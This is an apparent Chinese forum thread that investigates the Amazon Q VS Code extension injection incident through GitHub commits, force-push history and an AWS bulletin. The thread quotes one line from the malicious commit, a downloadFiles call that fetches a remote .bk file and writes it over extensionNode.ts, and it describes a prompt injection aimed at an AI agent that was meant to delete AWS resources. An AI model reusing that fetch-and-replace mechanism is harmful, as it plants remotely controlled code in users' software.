Amazon Q 的大瓜, 自动清理所有 AWS 资源, 欣赏一下注入的提示词

这也不是官方的代码啊，经典 github fork 伪造提交，这个演都不演一下
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.

@codehz Google: amazon q injection

https://medium.com/@ismailkovvuru/the-amazon-q-vs-code-prompt-injection-explained-impact-and-learnings-for-devops-3a9d2f752dea

@cecil2016 这消息源头就是那个“黑客”提交信息给 404media ，然后一堆营销号媒体转发了一下，就成真了吗

@codehz https://aws.amazon.com/cn/security/security-bulletins/AWS-2025-015/

@cecil2016 你但凡看下自己发的这个 SU 修的是什么 CVE 呢？
In the course of our investigation of AWS-2025-016, we determined that Amazon Q Developer for VS Code Extension had an inappropriately scoped GitHub token in their CodeBuild configuration.
With that access token, the threat actor was able to commit malicious code into the extension's open-source repository that was automatically included in a release.
After we identified this, we immediately revoked and replaced the credentials, removed the malicious code from the code base, and subsequently released Amazon Q Developer for VS Code Extension version 1.85.0.
这个修的 Github Token Scope 设的太大的问题，跟你发的代码有一毛钱关系？

@turygo 你发的这段已经说的很清楚了, 尝试分解下长句理解

@turygo
1. revoked and replaced the credentials
2. removed the malicious code from the code base

https://github.com/aws/aws-toolkit-vscode/commits/v1.84.0/ 确实有点乱，1.84.0 是 23 年的 release ，另外也没看到 PR 中有任何关于 1294b38 的历史，除非 Github 帮忙删除了

@codehz 看了很多相关的文章，没一个有实锤，基本就是引用 404 media ，还以为真的能吃个大瓜

@leir
https://github.com/aws/aws-toolkit-vscode/commits/v1.84.0/
下边这个 tag
https://github.com/aws/aws-toolkit-vscode/commits/amazonq/v1.84.0/

这有啥好争论的？直接看它 Activity 有没有 force 不就行了吗？
OP 可能不了解 GitHub 上的仓库机制。你只要 fork 之后，修改的代码，都能通过带原仓库的 URL 进行访问。只需要复制你 fork 及后面修改代码后提交的 commit id 就替换能访问了。

@codehz @turygo @leir 给各位补充了代码库分析. 能实锤的是这个提交: https://github.com/aws/aws-toolkit-vscode/commit/678851bbe9776228f55e0460e66a6167ac2a1685

攻击者完成了第一步, 后续需要将恶意代码写到 extensionNode.bk, 可惜现在的确没有第二次提交的实证了.

medium.com 提到使用"Commit Trail"来确认第二次的提交, 需要在事发前后同步过该库的人查看, 新下载的 tag 已经看不到 extensionNode.bk 的提交.

@skiy 感谢分享, force push 是这个: https://github.com/aws/aws-toolkit-vscode/compare/215b32058086bb20bd2edc33c3d0dd624df1f449...4160c5baf630368edab09f7828f9d0f8ace6b527

force push 后 extensionNode.bk 的新建和删除记录就都没了.

为避免已更新到 v1.84.0 的用户被攻击, 无论如何 v1.84.0/extensionNode.bk 必须要删除, 否则已发布的代码会下载: https://raw.githubusercontent.com/aws/aws-toolkit-vscode/amazonq/v1.84.0/scripts/extensionNode.bk 替换 extensionNode.ts 然后执行.

也就是说 amazon 无论如何都要 force push 一次, 清掉 extensionNode.bk 这个文件.

extensionNode.bk 是否曾经真实存在过, 已成悬案.

但这行代码痕迹仍在,

downloadFiles([`https://raw.githubusercontent.com/${REPO_NAME}/${TAG_NAME}/scripts/extensionNode.bk`], "src/", "extensionNode.ts")

@jqknono GitHub 的 PR 应该不能删除吧（至少我用过的个人&企业的都没有看到能删除 PR 的），所以如果曾经 merge 进 release 的话，就算是 force push 没有使用 revert 也至少有一个 PR 是有恶意代码的 commit 的

@jqknono

1. 它官方仓库的 activity 并没有任何强制覆盖的记录
https://github.com/aws/aws-toolkit-vscode/activity?activity_type=force_push

2. 你要先理解我之前说的话。
https://github.com/AlistGo/alist/tree/b1caed133b0b3de4200d416d2f865959b3fbf048
上面的链接，你说不是 alist 仓库就关闭清代码了？它这些是不是它操作的？
但实际上，并不是，而是 https://github.com/OpenListTeam/alist 这个仓库的

GitHub force 是会在 Activity 有操作记录的。当然，如果有可能 AWS 跟 GitHub 私下的操作的话，那就不了解了。

@skiy 没明白, 这不是 force push 吗?

@jqknono 你没明白我意思？它是有 force 。但它并不是因为你所说的这个的代码的覆盖。你查看它没有覆盖前的代码，有没有存在那个代码就知道了。

@jqknono 比如，它最后最新那条的覆盖是 76acb1e：
https://github.com/aws/aws-toolkit-vscode/commits/76acb1ea56600fc6cf12b367fde5a7c846a493fd/

它最后覆盖的代码时，你所谓的恶意代码都还没有开始写。

https://github.com/aws/aws-toolkit-vscode/commits/1294b38b7fade342cfcbaf7cf80e2e5096ea1f9c

@skiy 我的意思是 reset hard 加 force push, 这样就没有恶意文件的痕迹. 否则一个公开库泄露了 accesskey, 岂不是没法彻底清理提交的内容了?

@jqknono 你是真没 force push 过吗？我建议你去尝试一下。

你看到图片中有 “ 76acb1e…3f34419” 了没？它就是你 reset --hard 之后，再 force push 后的记录。

原来的是 76acb1e ，而你 reset --hard 之后一，再推就会变成 3f34419 。哪怕你再 reset --hard 也无济于事。

建议你在创建个项目操作，操作一遍再说。